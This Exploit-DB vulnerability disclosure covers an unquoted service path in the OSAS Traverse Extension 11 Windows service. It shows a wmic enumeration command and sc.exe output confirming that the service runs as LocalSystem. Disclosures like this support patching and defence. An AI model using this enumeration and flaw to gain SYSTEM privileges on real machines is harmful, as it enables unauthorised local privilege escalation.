OSAS Traverse Extension 11 – ‘travextensionhostsvc’ Unquoted Service Path

  • 作者: Johnny Tech
    日期: 2021-03-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49698/
  • # Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path
    # Exploit Auth: Tech Johnny
    # Vendor Homepage: https://www.osas.com
    # Version: 11 x86
    # Tested on: Windows 2012R2
    
    Details:
    
    C:\Windows\system32>wmic service get name, pathname, displayname,
    startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr
    /i /v """
    
    TRAVERSE Automation Service TravExtensionHostSvc C:\Program Files\Open
    Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe Auto
    
    C:\Windows\system32>sc.exe qc travextensionhostsvc
    [SC] QueryServiceConfig SUCCESS
    SERVICE_NAME: travextensionhostsvc
    TYPE : 10 WIN32_OWN_PROCESS
    START_TYPE : 2 AUTO_START (DELAYED)
    ERROR_CONTROL : 1 NORMAL
    BINARY_PATH_NAME : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe
    LOAD_ORDER_GROUP : TAG : 0
    DISPLAY_NAME : TRAVERSE Automation Service
    DEPENDENCIES :
    SERVICE_START_NAME : LocalSystem